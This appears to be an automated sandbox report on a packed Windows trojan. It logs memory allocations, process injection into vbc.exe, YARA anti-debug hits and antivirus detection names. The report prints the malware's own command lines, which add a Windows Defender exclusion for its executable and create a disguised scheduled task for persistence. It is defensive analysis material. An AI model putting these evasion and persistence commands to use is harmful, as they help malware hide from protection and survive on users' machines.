NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ee3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a40000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72f21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f5a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72f22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f65000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	schtasks.exe /Create /TN "Updates\wLPRsknlyKFXuL" /XML "C:\Users\test22\AppData\Local\Temp\tmpB188.tmp"
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\wLPRsknlyKFXuL.exe"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wLPRsknlyKFXuL" /XML "C:\Users\test22\AppData\Local\Temp\tmpB188.tmp"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\wLPRsknlyKFXuL.exe"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Jan. 11, 2022, 10:17 a.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\wLPRsknlyKFXuL.exe" filepath: powershell	1	1	0
ShellExecuteExW Jan. 11, 2022, 10:17 a.m.	show_type: 0 filepath_r: schtasks.exe parameters: /Create /TN "Updates\wLPRsknlyKFXuL" /XML "C:\Users\test22\AppData\Local\Temp\tmpB188.tmp" filepath: schtasks.exe	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000b0600', u'virtual_address': u'0x00002000', u'entropy': 7.377859823163174, u'name': u'.text', u'virtual_size': u'0x000b05b4'}

entropy

7.37785982316

description

A section with a high entropy has been found

entropy

0.800340328985

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 11, 2022, 10:17 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Jan. 11, 2022, 10:17 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	schtasks.exe /Create /TN "Updates\wLPRsknlyKFXuL" /XML "C:\Users\test22\AppData\Local\Temp\tmpB188.tmp"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wLPRsknlyKFXuL" /XML "C:\Users\test22\AppData\Local\Temp\tmpB188.tmp"

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2344 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003ac	1	0	0

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\tmpB188.tmp

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Jan. 11, 2022, 10:17 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELÒl¥Aà \|`Ô@@.text\|{\| ` base_address: 0x00400000 process_identifier: 2344 process_handle: 0x000003ac	1	1	0
WriteProcessMemory Jan. 11, 2022, 10:17 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2344 process_handle: 0x000003ac	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Jan. 11, 2022, 10:17 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELÒl¥Aà \|`Ô@@.text\|{\| ` base_address: 0x00400000 process_identifier: 2344 process_handle: 0x000003ac	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2768 called NtSetContextThread to modify thread in remote process 2344
NtSetContextThread Jan. 11, 2022, 10:17 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4314208 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000348 process_identifier: 2344	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2768 resumed a thread in remote process 2344
NtResumeThread Jan. 11, 2022, 10:17 a.m.	thread_handle: 0x00000348 suspend_count: 1 process_identifier: 2344	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

Lionic	Trojan.MSIL.PowerShell.4!c
Elastic	malicious (high confidence)
FireEye	Generic.mg.97ccf6ebd6abe778
McAfee	Artemis!97CCF6EBD6AB
Cylance	Unsafe
Alibaba	Trojan:Win32/starter.ali1000139
BitDefenderTheta	Gen:NN.ZemsilF.34114.3q0@amIB9!o
Cyren	W32/MSIL_Kryptik.GIT.gen!Eldorado
Symantec	Scr.Malcode!gdn30
ESET-NOD32	a variant of MSIL/Kryptik.ADYJ
Paloalto	generic.ml
ClamAV	Win.Trojan.Remcos-9846521-0
Kaspersky	HEUR:Trojan-Spy.MSIL.Noon.gen
SUPERAntiSpyware	Trojan.Agent/Gen-Downloader
Avast	Win32:TrojanX-gen [Trj]
Sophos	Mal/Generic-S
McAfee-GW-Edition	Artemis!Trojan
SentinelOne	Static AI - Suspicious PE
Ikarus	Trojan.MSIL.Crypt
Avira	TR/Kryptik.wstxn
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
Cynet	Malicious (score: 100)
Malwarebytes	Malware.AI.1888423890
APEX	Malicious
Fortinet	MSIL/Kryptik.ADXR!tr
AVG	Win32:TrojanX-gen [Trj]
Cybereason	malicious.0c0445

Executed a process and injected code into it, probably while unpacking (17 events)

Time & API	Arguments	Status	Return
NtResumeThread Jan. 11, 2022, 10:17 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2768	1	0
NtResumeThread Jan. 11, 2022, 10:17 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2768	1	0
NtResumeThread Jan. 11, 2022, 10:17 a.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Jan. 11, 2022, 10:17 a.m.	thread_identifier: 2204 thread_handle: 0x00000394 process_identifier: 2172 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\wLPRsknlyKFXuL.exe" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000039c	1	1
CreateProcessInternalW Jan. 11, 2022, 10:17 a.m.	thread_identifier: 2240 thread_handle: 0x00000354 process_identifier: 2244 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wLPRsknlyKFXuL" /XML "C:\Users\test22\AppData\Local\Temp\tmpB188.tmp" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000039c	1	1
CreateProcessInternalW Jan. 11, 2022, 10:17 a.m.	thread_identifier: 2424 thread_handle: 0x00000348 process_identifier: 2344 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000003ac	1	1
NtGetContextThread Jan. 11, 2022, 10:17 a.m.	thread_handle: 0x00000348	1	0
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2344 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003ac	1	0
WriteProcessMemory Jan. 11, 2022, 10:17 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELÒl¥Aà \|`Ô@@.text\|{\| ` base_address: 0x00400000 process_identifier: 2344 process_handle: 0x000003ac	1	1
WriteProcessMemory Jan. 11, 2022, 10:17 a.m.	buffer: base_address: 0x00401000 process_identifier: 2344 process_handle: 0x000003ac	1	1
WriteProcessMemory Jan. 11, 2022, 10:17 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2344 process_handle: 0x000003ac	1	1
NtSetContextThread Jan. 11, 2022, 10:17 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4314208 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000348 process_identifier: 2344	1	0
NtResumeThread Jan. 11, 2022, 10:17 a.m.	thread_handle: 0x00000348 suspend_count: 1 process_identifier: 2344	1	0
NtResumeThread Jan. 11, 2022, 10:17 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 2172	1	0
NtResumeThread Jan. 11, 2022, 10:17 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2172	1	0
NtResumeThread Jan. 11, 2022, 10:17 a.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 2172	1	0
NtResumeThread Jan. 11, 2022, 10:17 a.m.	thread_handle: 0x000004a4 suspend_count: 1 process_identifier: 2172	1	0

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All